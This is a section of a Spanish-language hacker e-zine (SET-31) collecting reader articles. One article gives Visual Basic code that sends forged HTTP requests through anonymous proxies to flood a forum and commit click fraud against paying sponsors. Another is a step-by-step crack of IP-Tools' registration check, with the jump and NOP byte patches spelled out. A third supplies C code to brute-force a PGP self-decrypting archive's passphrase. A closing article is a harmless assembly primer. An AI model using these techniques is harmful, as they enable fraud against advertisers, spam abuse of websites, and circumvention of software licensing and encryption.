-[ 0x03 ]--------------------------------------------------------------------
-[ Bazar de SET ]------------------------------------------------------------
-[ by Others ]-------------------------------------------------------SET-31--

Indice

3x01  Emulando Headers                          Varios       eugenioclrl

3x02  Cracking IPTools                          Cracking     blackngel

3x03  PGP SDA                                   Cracking     ilegalfaqs

3x04  Asembler para tontos                      Info         Club Fenix

3x05  Cracking Power VCR                        Cracking     The Ghost

3x06  Re-backdoors                              Hacking      FCA00000


-[ 3x01 ]--------------------------------------------------------------------
-[ Emulando Headers ]--------------------------------------------------------
-[ by eugenioclrl ]----------------------------------------------------------

			Emulando headers...
			By Eugenio!
			eugenioclrc@hotmail.com


Sobre este articulo;
--------------------
Este articulo trata sobre la emulacion de headers, esto era muy comun en otras 
epocas... recuerdo los grupo Soangels, hackgirls, Cheatruz y hackadventaje.
Basicamente surgieron para estafar a los sponsors que pagaban por navegar,
recivir hits, recivir mails, etc, etc. Solian tener simples scripts en visual
que realizaban de forma automatica visitas y clicks. Tambien salio el programa
Clicking automat, conocido tambien como CACA, ese si no me equivoco fue el 
momento cumbre jejejeje, despues todos se dieron cuenta que la mayoria de las 
empresas o no pagan, o pagan muy poco y no se justifica semejante esfuerzo.


Manos a la obra
---------------


Ejemplo Nro 1: Emulando una variable de tipo post...

Digamos que quisieramos flodear un foro, pero el mismo no nos deja hacer mas
de dos posteos, luego nos banea la ip. Que deberiamos hacer?
Primero deberiamos saber que es lo que queremos generar... para ello nos 
bajamos el programa Proxy sniffer server, busquenlo en el tio google, o usen 
algun sniffer, para usar este programa debemos configurar el explorador para 
que use como proxy nuestra propia pc, esto se hace llendo a opciones de 
internet, conexiones, propiedades, ahi picamos en usar servidor proxy y 
escribimos localhost, en el puerto 7999.
Una vez instalado el programa y configurado el explorer vamos al foro, en el
escribimos la solicitud y la enviamos. Luego vamos al proxy sniffer, y vemos
que ha pasado, tocamos en la pestaЯita de Proxy sniffer console y aparecera 
algo como;

POST /foro HTTP/1.0 (www.ejemplo.com:80)
  >>> ID=elforo&do=escribir&nombre=jose%20luis&mensaje=esta%20web%20APESTA

Bueno ya tenemos lo que queremos, ahora debemos de hacer un pekeЯo programita 
que se conecte a distintos proxys (anonimos por supuesto), y envie la peticion 
que queremos, en este caso un post.
No voy a escribir todo el programa, pero voy a hacer algo mas o menos 
decente...

******************************************************
Winsock1.connect "servidor", puerto

******************************************************
Private Sub Winsock1_Connect


mensaje = 
"ID=elforo&do=escribir&nombre=jose%20luis&mensaje=esta%20web%20APESTA"

Requestheader = "POST http://www.ejemplo.com/foro HTTP/1.0" & Chr(13) & 
Chr(10) & _
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shock
wave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, 
application/m
sword, */*" & Chr(13) & Chr(10) & _
"Referer: none" & Chr(13) & Chr(10) & _
"Accept-Language: en/us" & Chr(13) & Chr(10) & _
"Connection: Keep-Alive" & Chr(13) & Chr(10) & _
"Content-Type: application/x-www-form-urlencoded" & Chr(13) & Chr(10) & _
"Proxy-Connection: Keep-Alive" & Chr(13) & Chr(10) & _
"User-Agent: Mozilla!" & Chr(13) & Chr(10) & _
"Host: " & Winsock1.remotehost & Chr(13) & Chr(10) & _
"Content-Length: " & Len(mensaje) & Chr(13) & Chr(10) & _
"Pragma: no-cache" & Chr(13) & Chr(10) & _
Chr(13) & Chr(10) & _
mensaje

winsock1.senddata requestheader

end
******************************************************

ATENCION, no corten y peguen, esto no funciona asi como si, por favor lean
atentamente todo, este codigo no funciona si lo cortan y pegan, esta escrito
solo para ilustrar un poco como funciona todo. Les recomendaria siempre usar
varias variables aleatorias, como por ej el usear agent, el lenguage y el
referer.



Ejemplo Nro2: Timo a una web

Digamos que Scam es una empresa de redireccionamiento que nos da 1 dolar por 
cada 1000 visitantes que vayan a http://www.scam.com/mipagina
Nuevamente usamos el proxy sniffer, configuramos todos, y visitamos
http://www.scam.com/mipagina.
Si lo examinamos y ignoramos los gifs y demas basuras vemos que visita dos 
lugares importantes...
nro 1) http://www.scam.com/mipagina
y nro 2) http://www.scam.com/stat.asp?54,4324464
esta conclucion la sacamos luego de ver la solapita de request/response, en la 
pag nro uno nos da la link al stat.asp?numeroalazarde10digitos y tb nos da la 
cookie que este precisa...
que deberiamos hacer?
ok, la forma de proceder seria la siguiente...


nos conectamos con el winsock1
enviamos la peticion
recivimos la data de winsock1, si en ella esta la cadena "Set Cookie", 
guardamos
la cookie que precisamos usando el comando mid, si en la data se encuentra 
la cadena "stat.asp?" copiamos el link al cual nos dirije, desconectamos el 
winsock1,
nos conectamos con el winsock2 y enviamos una peticion al stat.asp?nroalazar 
con la cookie

seria algo asi
********************************

function header1

header1 = "GET http://www.scam.com/mipagina HTTP/1.0" & Chr(13) & Chr(10) & 
_
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shock
wave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, 
applicatio
n/msword, */*" & Chr(13) & Chr(10) & _
"Referer: none" & Chr(13) & Chr(10) & _
"Accept-Language: en/us" & Chr(13) & Chr(10) & _
"Connection: Keep-Alive" & Chr(13) & Chr(10) & _
"Content-Type: application/x-www-form-urlencoded" & Chr(13) & Chr(10) & _
"Proxy-Connection: Keep-Alive" & Chr(13) & Chr(10) & _
"User-Agent: Mozilla!" & Chr(13) & Chr(10) & _
"Host: " & Winsock1.remotehost & Chr(13) & Chr(10) & _
"Pragma: no-cache" & Chr(13) & Chr(10)

end function

Private Sub Winsock1_Connect()
Winsock1.sendata header1
end sub


Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)

Winsock1.GetData ladata
If InStr(1, ladata, "'stats.asp?") > 0 Then
cookie = Mid(ladata, InStr(1, ladata, "ASPSESS"), 45)
lalink = Mid(ladata, InStr(1, ladata, "stats.asp?"), 19)


end sub

******************************

bueno, con eso conseguimos la link a stats.asp?, luego solo hay que hacer la
coneccion a esa link y utilizar la cookie.
No esperen que haga todo yo... Esto es tan simple como ver el proxy sniffer 
o sniffer que estemos usando, examinar los headers y emularlos!


Herramientas que usamos
-----------------------

Proxyrama: para la deteccion de los proxys anonimos que usamos
Proxy sniffer: para interceptar los paquetes que luego emulamos
Un cerebro: esto es lo mas jodido de conseguir, estube buscando y no se 
puede bajar de ningun lado
Inspiracion: mmm, con un poco de marihuana, eso si cuando programen no usen
muchas variables, o se van a olvidar todo!



Resumen
-------

Las variantes son infinitas, tambien esta la posibilidad de conectarnos a un
servidor pop3 y recivir esos clasicos mails en los cuales te dan una link 
para clickear y te pagan por que la visites.
Creo que esto es facil de entender, si a alguien le quedo alguna o muchas 
dudas le recomendaria que averigue mas de los protocolos http, y visite
www.planetsourcecode.com ahi va a encontrar grandes y buenos ejemplos.
Realmente la unica forma de impedir este tipo de ataques segun veo es 
baneando las ip de los proxys.



Despedida
---------

Espero que les haya gustado mi articulo, se que le falta bastante, y podria 
ser mas jugoso y con mas explicaciones del tipo tecnica, pero la verdad no tengo
tiempo, tengo que estudiar algebra :( , de todas formas el objetivo del articulo
era sembrar la duda, y darles algunos puntos de los cuales partir, para que 
ustedes terminen de averiguar todo.
Saludos a todos, y gracias a SET...

Eugenio!
eugenioclrc@hotmail.com




-[ 3x02 ]--------------------------------------------------------------------
-[ Cracking IPTools ]--------------------------------------------------------
-[ by blackngel ]------------------------------------------------------------



        @                                                              @
       @@@             blackngel_hack@hotmail.com                     @@@
        IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
        IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
        III @@@@  @     @@@@@ @@@@@ @   @ @@    @ @@@@@  @@@@@ @     III
        III @   @ @     @   @ @     @  @  @ @   @ @      @     @     III
        III @@@@@ @     @@@@@ @     @@@   @  @  @ @  @@@ @@@@  @     III
        III @   @ @     @   @ @     @  @  @   @ @ @   @  @     @     III
        III @@@@  @@@@@ @   @ @@@@@ @   @ @    @@ @@@@@  @@@@@ @@@@@ III
        IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
        IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
       @@@                                                            @@@
        @                                                              @
                           %%%%%%%%%%%%%%%%%%%%%%%%%
                           %%%===================%%%
                           %%% CRACKING IP-TOOLS %%%
                           %%%===================%%%
                           %%%%%%%%%%%%%%%%%%%%%%%%%
                      "Bienvenidos al mundo de lo real..."



$$$$$$$$$$$
 00 INDICE
$$$$$$$$$$$



                    ЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇ
                    ЇЇЇ 00 ЇЇЇ INDICE             ЇЇЇ
                    ЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇ
                    ЇЇЇ 01 ЇЇЇ PROLOGO            ЇЇЇ
                    ЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇ
                    ЇЇЇ 02 ЇЇЇ INTRODUCCION       ЇЇЇ
                    ЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇ
                    ЇЇЇ 03 ЇЇЇ PRIMEROS PASOS     ЇЇЇ
                    ЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇ
                    ЇЇЇ 04 ЇЇЇ EVITANDO MOLESTIAS ЇЇЇ
                    ЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇ
                    ЇЇЇ 05 ЇЇЇ ULTIMOS PASOS      ЇЇЇ
                    ЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇ
                    ... 06 ЇЇЇ CONSEJOS           ЇЇЇ
                    ЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇ
                    ЇЇЇ 07 ЇЇЇ DESPEDIDA          ЇЇЇ
                    ЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇЇ


Isaac Asimov: "En primer lugar acabemos con SСcrates, porque ya
               estoy harto de este invento de que no saber nada
               es un signo de sabidurМa." 



$$$$$$$$$$$$
 01 PROLOGO
$$$$$$$$$$$$



Mis queridos amigos, he hecho un recuento de la cantidad de articulos
sobre "cracking" escritos en SET y desde luego, destacan entre la
minoria.

Este articulo lo escribo con el unico fin de variar de tematica sobre
todo entre los ultimos numeros de este fantastico e-zine y con el
objetivo de que al igual que yo, en proximos numeros se siga escribiendo
articulos sobre estas tecnicas.

Que me fascina de la ingenieria inversa? Pues que los resultados son
realmente gratos. El minimo esfuerza provoca grandes beneficios, es decir,
que con pocos conocimientos ya se obtienen recompensas.
Creo recordar que en un articulo que lei de Ricardo Narvaja, dijo que
siendo el un novato en el tema (eso dice el xD) se considera capaz de
crackear el 80% de los programas existentes en internet.

Esto da una vision de la poca seguridad del software actual, pero bueno,
de este tema ya se ha hablado demasiado.

Como comprobareis a lo largo (o corto) del articulo, no he puesto tiradas
de codigo ensamblador ya que al igual que yo cuando no tenia ni idea de
esto, se que provocan un poco de respeto y miedo al mas novato.
Con ello quiero conseguir que veais que el cracking no es tan dificil y
que no tiene nada de misterioso, solo requiere estudio, esfuerzo y como
madfran me dijo en su dia "perseverancia".



$$$$$$$$$$$$$$$$$
 02 INTRODUCCION
$$$$$$$$$$$$$$$$$



Que es IP-Tools? Pues es una herramienta que nos permite obtener mucha
y variada informacion de un ordenador remoto e incluso del nuestro.
Es un kit que contiene: 

 - NB escaner (NetBios)
 - Name escaner
 - Port escaner
 - Lista de las conexiones actuales
 - Ping escaner
 - Trace (Traceroute)
 - Whois
 - Finger
 - NS Lookup
 - Get Time
 - Telnet
 - IP Monitor
 - Host Monitor

y todo ello en una misma interfaz muy simple de utilizar y ciertamente
amigable.

Todo muy bonito si no fuera porque nada mas iniciar el programa (el cual
podemos encontrar en http://www.ks-soft.net/ip-tools.eng/index.htm) nos
sale una ventanita con una tirada de texto que nos indica que el programa
no es de uso "libre" y que su uso se limita a una cantidad de tiempo de
"21" dias.

En la misma ventana nos encontramos con un boton con el nombre de
"Register Now" que nos permitira introducir un nombre y un numero de serie
para registrar el programa.

Como no conocemos tales datos pues aqui el porque de este articulo.


HERRAMIENTAS
------------

W32dasm -> Nuestro querido desensamblador.
Hedit   -> Un pobre editor hexadecimal que me acompaЯa alla a donde voy.

Para el cracker experimentado:

SoftIce u Olly -> Los mejores debuggers de la red.

Yo no los he utilizado porque, repito, SOY UN NOVATO.

DECEPCIONES
-----------

Soy un completo novato en el arte del crackeo y por ello este articulo
conlleva alguna que otra decepcion.
Entre ellas la principal y que me dejara quedar en peor estado del que
ya estaba es la de que no he conseguido crackear el programa completamente.

Como? Lo que oyes, cuando escribo cualquier nombre y cualquier numero
consigo que el programa lo acepte y me aparezca como registrado. Tambien
he conseguido superar una limitacion pero, cuando reinicio el programa
otra vez, los datos de registro no son guardados y debo introducirlos
de nuevo aunque los vuelva a aceptar.

Porque escribes esto entonces? Porque me parece una pena desperdiciar las
pocas neuronas que tengo y quiza otra persona, acabe el trabajo por mi
que no quiere decir "para mi".

Bueno, en realidad los datos que yo introduzco si que son guardados en el
registro de windows, se cifran con algun algoritmo y se almacenan alli.
Esto lo compruebo porque, aunque cifrados, conservan el mismo numero de
caracteres, las claves tienen el nombre de: UserName y UserSNum.

Hay otras claves interesantes como:

- CountOfRuns2  -> Numero de veces que se ejecuto el programa.
- FirstRunTime2 -> Primera vez que el programa fue ejecutado. 
- LastRunTime   -> Ultima vez que el programa fue ejecutado.

Supongo (que listo que soy) que con estas dos ultimas claves se calcula
el numero de dias que llevan transcurridos para comparar con "21".



$$$$$$$$$$$$$$$$$$$
 03 PRIMEROS PASOS
$$$$$$$$$$$$$$$$$$$

La metodologia? La misma de siempre.

Empiezo abriendo IP-Tools, en los cuadros de la ventana de registro
introduzco unos datos cualesquiera y memorizo en mi mente (que para
algo la tengo) la frase que dice: "Sorry, your registration number
or name is invalid".

Ahora cierro el programa, le hago una copia en su direcctorio y abro
esta con el w32dasm. Lleva su tiempo el desemsamblar dicho programa
pero una vez hecho me voy a la zona de "Strings reference", alli busco
la citada cadena y hago doble click sobre ella para ir a la zona de
codigo que la referencia. Vuelvo a hacer doble click sobre la misma
cadena para comprobar que no hay otra zona del source en que aparece.

Bien, una vez en el codigo, miramos encima de la cadena las direcciones
desde donde es referenciada por algun salto condicional o incondicional.
Nos dice que las mismas son: 

004ACD3D
004ACD57
004ACD92
004ACDBA
004ACDD5

Observamos que todas ellas estan muy juntitas, pues nada mas que iremos
a la primera de ellas con el boton "Go to code location", introducimos
alli a donde deseamos ir y aparecemos en esa zona de codigo.
A partir de ahi nos moveremos con los cursores del teclado ya que las
llamadas se encuentran cerca.

Miramos que instruccion hay en cada una de las direcciones anteriores
y vemos que los dos primero saltos condicionales son "je" y los tres
siguientes "jne".

Lo primero que se os vendra a la cabeza al igual que a mi, sera cambiar
los cinco saltos por su contrario, es decir, los "je" por "jne" y
viceversa.

Pues eso, sin pensarlo dos veces cojo mi editor hexadecimal y en las
direcciones correspondientes (mirar en la barra de estado de w32dasm
el @Offset) sustituimos los "84" por "85" y al reves.
Guardo la copia que acabo de editar cierro el Hedit y ejecuto la
misma.

Sorpresa, un mensaje muy poco amigable nos dice: "Program was corrupted!"
pues que bien, ha detectado que hemos modificado e l programa y no
nos permite ejecutarlo.

En la siguiente seccion le daremos lo que se merece y nos saldremos con
la nuestra de una forma facilita.



$$$$$$$$$$$$$$$$$$$$$$$
 04 EVITANDO MOLESTIAS
$$$$$$$$$$$$$$$$$$$$$$$



Con que si, el programa se ponde duro, pues vamos a suavizar las cosas.

Lo mismo que antes, buscamos la cadena mencionada entre las strings y
doble click. Vemos que son tres simples funciones que se encargan de
mandarnos el maldito mensajito y de cerrarnos el programa.

Como hacer que no haga nada? Pues "nopeando" (os suena 0x90?).

Supongo que la llamada "call 00444CA0" es la que nos muestra el
mensaje y "jmp 004D9C6B" el que nos echa fuera, pero por el
esfuerzo que me pedia yo nopee las tres instrucciones y asi,
aunque pudieramos ejecutar el programa me evitaba el dichoso
mensaje.

De nuevo abro mi querido Hedit y en las direcciones de las tres
funciones cambio todos los valores hexadecimales por "90".

Para dummies:
Cambio la cadena consecutiva "B8FC9C4D00E8A9B3F6FFE96F030000"
por ->                       "909090909090909090909090909090"

Salvo (guardo) el ejecutable, salgo del Hedit y pruebo a ejecutarlo
otra vez. Por fin, ya puedo entrar.

Para ver si los cambios echos en la tercera seccion tuvieron sus
frutos, entro en la ventana de registro e introduzco unos datos
aleatorios. Desilusion, el dichoso mensajito de "Sorry..." sigue
dandonos la lata.

Pasamos a la ultima seccion de trabajo y a la carga.



$$$$$$$$$$$$$$$$$$
 05 ULTIMOS PASOS
$$$$$$$$$$$$$$$$$$



En el w32dasm nos movemos a la zona de codigo donde antes teniamos
aquellos 5 saltos condicionales, si bajamos con el cursor un poquito
mas hacia abajo vemos que la primera cadena que encontramos dice:
"Thank you for registering IP-Tools".

Con ello deduzco que si no se hubieran realizado ninguno de los saltos
anteriores el codigo nos llevaria inevitablemente hasta esta zona,
pues nada, como no quiero hacer distinas alternancias entre "je's" y
"jne's" hasta que acierte (si es que se pudiera conseguir) me dedico
a la facil tarea de nopear las cinco instrucciones.

No repetire el proceso porque ya lo he dicho anteriormente y, lo bueno,
si corto, dos veces bueno.

Pruebo por ultima vez a registrar mi version de IP-Tools y por arte de
magia, al introducir cualquier dato en los dos cajetines de texto me
salta el mensajito de agradecimiento por registrar su producto y nos
manda reiniciar el programa para que los cambios surjan efecto.

Nos muestra en la ventana los datos que hemos introducido como si fueran
de un registro valido.

Pues nada, que reiniciamos el dichoso programa y el trabajo que hemos
realizado no nos ha servido para nada. Siempre nos permitira registrarnos
pero los cambios nunca permanecen a la siguiente ejecucion.



$$$$$$$$$$$$$$
 06 CONSEJOS
$$$$$$$$$$$$$$



Solo por dar un poco mas la vara os dire aqui un par de cosillas.

Un poco mas abajo del codigo donde aparece el mensaje de agradecimiento
encontramos un codigo que referencia a las cadenas "UserName" y
"UserSNum". Supongo que son para almacenar los datos recien introducidos
en el registro, ademas los dos llaman a una misma funcion:

"call 004353AC"

Lo que me llama un poquito la atencion son tres cadenas que se encuentran
justo debajo de este codigo y que pueden tener algo que ver o bien con la
clave o con el algoritmo de cifrado de los datos (o ninguno), los expongo
por mera curiosidad:

"\XS5o$flt2w/a"
"DFACTXA-5"
"DZAVTOA-6"

Podeis investigar esto y si averiguais algo me gustaria que me avisaseis
por medio de mi correo.

En "Strings reference" vamos hasta donde estan las cadenas "User..." y
hacemos dos veces doble click sobre ellas para darnos cuenta de que
hay otra zona en el codigo donde son utilizadas, en esa zona son
utilizadas por dos veces.
Podria ser quizas para abrir la clave y despues leer o escribir en ella.
Este es otro buen punto de investigacion.

No intenteis nopear nada ahi ni cambiar los saltos condicionales poque
yo ya lo he probado, no funciona y, de esta forma, os ahorro el esfuerzo. 


Podeis ir tambien al boton de "Import Functions" y comprobar que se
usan llamadas como: RegOpenKey..., RegQueryValue..., RegSetValue..., etc.
Por tanto, no me equivoco mucho.

Como ultima recomendacion para los que sepais mas de esto os recomiendo
utilizar un debugger en vez de un desensamblador, poner breackpoints en
las funciones que os interesen. No mencionare cuales corresponden a los
cuadros de texto porque todos las conocemos.

Para los mas locos, que estudien el algoritmo si es que existe y la clave
no es fija, y que hagan un keygen para la gente mas vaga.



$$$$$$$$$$$$$$
 07 DESPEDIDA
$$$$$$$$$$$$$$



Como habeis podido comprobar este articulo ha sido cortito pero,
tampoco es que pretendiera lo contrario.

Reitero de nuevo que me gustaria que hubiera un poco mas de
aplicacion y esfuerzo sobre este tema. Apuesto que en la comunidad
hispana hay gente muy buena y los invito a salir a la luz para,
precisamente, iluminar a los demas con su conocimiento.

Por primera vez os invito a que me insulteis y me digais de todo
en mi direccion de correo puesto que he demostrado ser un inepto en
este mundo desconocido en el que me he metido.
Con deciros que lo unico que he crackeado en mi vida a parte de un
par de "crackmes" ha sido el winzip (cosa de crios xD). Pero bueno,
para que mentir, espero que con tiempo y esfuerzo cambie mi
situacion y pueda traeros algo mas serio.

Con esto, me despido de nuevo, que ya estareis aburridos de mi.
Un abrazo gente.


Isaac Asimov: "Parte de la inhumanidad de las computadoras es que,
               una vez que estАn programadas competentemente y
               trabajando correctamente, son completamente honestas."





                                                         by blackngel


-[ 3x03 ]--------------------------------------------------------------------
-[ PGP SDA ]-----------------------------------------------------------------
-[ by ilegalfaqs ]-----------------------------------------------------------

Minicracking PGPSDA para Windows
--------------------------------
Os presento un metodo asequible de fuerza bruta para sacar la passphrase de
1-2 bytes de un PGPSDA para Windows.

No trata de algoritmos de desencriptacion ni de parches en las instrucciones
ensamblador, es mucho mas simple. No es una novedad, pero tampoco encontre
algo similar (tampoco he buscado).
Puede aplicarse a otras aplicaciones que exijan una contrase~a de la misma
forma. O puede aplicarse a otros fines, a otras automatizaciones (es lo que
pretendo aportar con este escrito, lo que pasa es que si hago referencia a
'crackear' y a 'PGP' se hace mucho mas atractivo para leer. Por que sera??


Recuerden: hasta 2 a~os de prision para los que fabriquen, tenga, pongan en
circulacion o importen medios especificamente destinados a facilitar la
supresion no autorizada o la neutralizacion de cualquier dispositivo tecnico
que se haya utilizado para proteger programas de ordenador.
En este caso, yo me autorizo a mi mismo a neutralizar la proteccion de mis
programas, y nadie me autoriza a neutralizar las de programas de los demas.
Tampoco infrinjo la espesa licencia de PGP.
Igualmente, este metodo es bastante inofensivo porque no puede con passwords
de mas de 2 bytes.


Que es un PGPSDA
----------------
Con 'PGPSDA' me referire, para abreviar, a un SDA (version 8.0.2) de la PGP
Corporation para el sistema Windows.

Un PGPSDA o Self Decrypting Archive es un archivo ejecutable que ha sido
encriptado con la ayuda de una contraseєa y que puede ser desencriptado
ejecutandolo e introduciendo la contraseєa correcta.

Los PGPSDA son de utilidad para poder enviar datos encriptados alla donde no
se tiene instalado el programa desencriptador (PGP en este caso). Un SDA puede
ser un unico archivo, o contener multiples archivos y/o directorios.

No obstante, los PGPSDA solo se pueden abrir bajo el mismo sistema operativo
bajo el que fueron creados. Es decir, no podras abrir un SDA en un Mac si fue
creado con la version para Windows, y viceversa.


Miniataque por fuerza bruta
---------------------------
La idea es ir probando todas las combinaciones de caracteres hasta encontrar
la password.

Hay que tener en cuenta que la casilla admite passphrases de hasta 255
caracteres, y que el programa soporta la codificacion Unicode (en teoria, mas
de 1 millon de caracteres diferentes). Esto supone una eternidad probando las
diferentes combinaciones.
Podriamos limitarlo mucho mas, pongamos un tope de 15 bytes de password y los
80 caracteres ASCII mas comunes. De esta forma nos bastarian unos millones de
a~os para descifrarlo...

Vamos a ponerlo asequible, pondremos la password de 1-2 bytes de longitud,
asumiremos el ASCII de 128 caracteres, y ya iremos complicando mas adelante.

Ahora solo nos queda poner cada vez el caracter y pulsar al boton 'Aceptar'.
Y asi 128 veces, una para cada caracter.

Ya dije, el metodo es muy simple.

Para automatizarlo necesitaremos un programa en c que simule la introduccion
de la password y de la pulsacion del boton. Cerrad todas las aplicaciones
posibles antes de ejecutarlo. Seria algo como lo siguiente, que aunque grosero
y falto de optimizaciones, funciona (ejecutar desde MSDOS, pues requiere como
parametro el handle del boton de 'Aceptar'):


#include <windows.h>
HANDLE Riched;  //Handle de la ventana de clase RichEdit20W
int iBot=0;     //Valor del boton 'Aceptar'
char cBot[256]; //Valor del boton 'Aceptar'

int main(int argc, char **argv) {
if (argc<2) {
printf("Uso: %s -H \r\n", argv[0]);
printf("  -H  Handle del boton de Aceptar del PGPSDA.\r\n");
//Para saber el valor de H utilizad aplicaciones como Eureka o PasswordSpy
return(0);
}
wsprintf(cBot,"%s",&argv[1][1]);   //Handle da 'Aceptar'
HWND hDesktop = GetDesktopWindow();//Recupera handle del Desktop
if(EnumChildWindows(hDesktop,&EnumChildProc0,0)==0)return(0);//Valida Aceptar
if(iBot==0) return(0);
if(EnumChildWindows(hDesktop,&EnumChildProc1,0)==0)return(0);//Recup. Riched
if(EnumChildWindows(hDesktop,&EnumChildProc2,0)==0)return(0);//Probar passw
return(0);
}

BOOL CALLBACK EnumChildProc0(HWND hWnd,LPARAM lParam) {
char chWnd[256]; wsprintf(chWnd,"%d",(int)hWnd); //handle detectado
if(strcmp(chWnd,cBot)==0) { //es el mismo que el del boton 'Aceptar'
iBot=(int)hWnd; //Nos quedamos con el (int)Handle de 'Aceptar'
if(IsWindow(hWnd)==0) iBot=0; //Por si acaso
}
return TRUE;//continuar con el siguiente handle
}

BOOL CALLBACK EnumChildProc1(HWND hWnd, LPARAM lParam) {
static TCHAR szClass[512]; GetClassName(hWnd, szClass, 512);
//Coger handle de la celda de passphrase, que es de la clase 'RichEdit20W'.
//Para averiguarlo he utilizado aplicaciones como Eureka o PasswordSpy.
if(lstrcmp(szClass,"RichEdit20W")==0) Riched=hWnd;
return TRUE;//continuar con el siguiente handle
}

BOOL CALLBACK EnumChildProc2(HWND hWnd, LPARAM lParam) {
if((int)hWnd==iBot) { //estamos en el boton 'Aceptar'
for(int c=0;c<129;c++) { //probar los 129 caracteres (o 255, o mas)
SendMessage(Riched,WM_CHAR,(WPARAM)c,(LPARAM)0); //ESCRIBE PASSWORD
SendMessage(hWnd,BM_CLICK,(WPARAM)0,(LPARAM)0);  //PULSA 'ACEPTAR'
//Cuando acertemos, desaparecera el SDA y se creara el desencriptado
if(IsWindow(hWnd)==0) c=4000; //salir cuando desaparezca el boton
}
}
return TRUE;//continuar con el siguiente handle
}



Si quisieramos introducir passwords de varios bytes se trataria de enviar
varios WM_CHAR antes de pulsar el boton. Por ejemplo, para '123':

SendMessage(Riched,WM_CHAR,(WPARAM)49,(LPARAM)0); //1
SendMessage(Riched,WM_CHAR,(WPARAM)50,(LPARAM)0); //2
SendMessage(Riched,WM_CHAR,(WPARAM)51,(LPARAM)0); //3
SendMessage(hWnd,BM_CLICK,(WPARAM)0,(LPARAM)0);   //y pulsar 'Aceptar'


Con esta sencilla funcion podriamos poner una password Unicode a nuestro
PGPSDA que por teclado nos seria imposible de introducir. Por ejemplo, una
password mitad Braille mitad Cherokee, y a ver quien tiene huevos de romperla:
SendMessage(Riched,WM_CHAR,(WPARAM)0x2840,(LPARAM)0);
SendMessage(Riched,WM_CHAR,(WPARAM)0x2841,(LPARAM)0);
SendMessage(Riched,WM_CHAR,(WPARAM)0x13B4,(LPARAM)0);
SendMessage(Riched,WM_CHAR,(WPARAM)0x13B5,(LPARAM)0);


Limitacion: recursos GDI
------------------------
Desgraciadamente podeis encontraros con una limitacion gravisima: el brutal
descenso de los recursos GDI, almenos bajo Windows98 (que es donde puedo
probar).

Aunque lo hagas manualmente, cada caracter de password que introduzcas te hara
bajar los recursos GDI y de sistema un 0.1-0.2%. Parece poco, pero basta con
rellenar 4 veces una passphrase de 255 caracteres para tirar el sistema!!!.
Resulta impresionante y lamentable, compruebalo con el monitor de recursos
'rsrcmtr.exe' que trae Windows98.

Se trata de un aspecto intrinseco al dise~o de Windows98, un pseudo-bug
en la gestion de este tipo de memoria heredado de versiones 9x anteriores.

Conociendo la reputacion de los productos PGP, no me sorprenderia que hubieran
introducido deliberadamente este comportamiento para evitar ataques por fuerza
bruta como el presente, ya que cuando se cierra el PGPSDA toda la memoria se
libera y los recursos vuelven a su valor original sin problemas.


Se podria pensar en pasar la combinacion de caracteres por otros metodos,
saltandose la edicion de la RichEdit20W, capando montones de funciones que
no hace falta que se ejecuten y asi ahorrar tiempo y recursos. Pero eso
es otra historia.


Sean buenos, y recuerden que... simplemente recuerden, evitaran los problemas.




-[ 3x04 ]--------------------------------------------------------------------
-[ Assembler para tontos ]----------------------------------------------------
-[ by Club Fenix ]-----------------------------------------------------------


---------------------------------ASEMMBLER Y EL MISMO DOLOR DE CABEZA-------
----------------------------------------------------------------------------

A QUIEN VA DIRIGIDO




Mucha gente ha querido aprender Asembler, pero cuando lo han intentado, se
han topado con miles de instruciones que no entienden y que muchos manuales no 
han sabido explicar, Club Fenix quiere que esta seccion sea la que logre 
Iniciarte en el Mundo de la Programacion.

Hay solo 2 cosas que necesitas aparte de tu cerebro..


Mucha Paciencia y Mucha Paciencia

No quieras ir de frente a crear un virus y programas complejos antes tienes
que saber algunas instrucciones, cual es el sistema que utiliza la maquina y 
entenderlo.

Asi que empezemos ten encuenta que este es solo un capitulo habran mas, y
poco a poco veras como te vuelves un genio en la programacion o te mueres en 
el intento ( y Club Fenix espera que no te mueras en el intento, porque sino 
nuestra reputacion como maestros se caeria...y asi no es pues )

< aqui es donde te matas de risas y dices este pata es gracioso, o almeno
finge pe>

Si quieres ser un buen  programador debes  saber como funcionan todas las
instruciones

Habra momentos en las cuales quedras realizar una instruccion especifica,
pero si no sabes que existe o como funciona esta instrucion no lo usareis.

De igual manera, si ustedes se encuentran en una situacion donde piensan que
una cierta instruccion podria ser util entonces nos imaginamos sobre todo por
su bien que regresaran a refrescar su memoria en este Tutor y seran capaces de 
poner las instrucciones que necesiten inmediatamente.

Pero si ustedes son principiantes ( y estan mas perdidos, que el editor que
escribe esto) estamos seguro que sino aprenden  de esta forma deberian  
dedicarse a la costura.


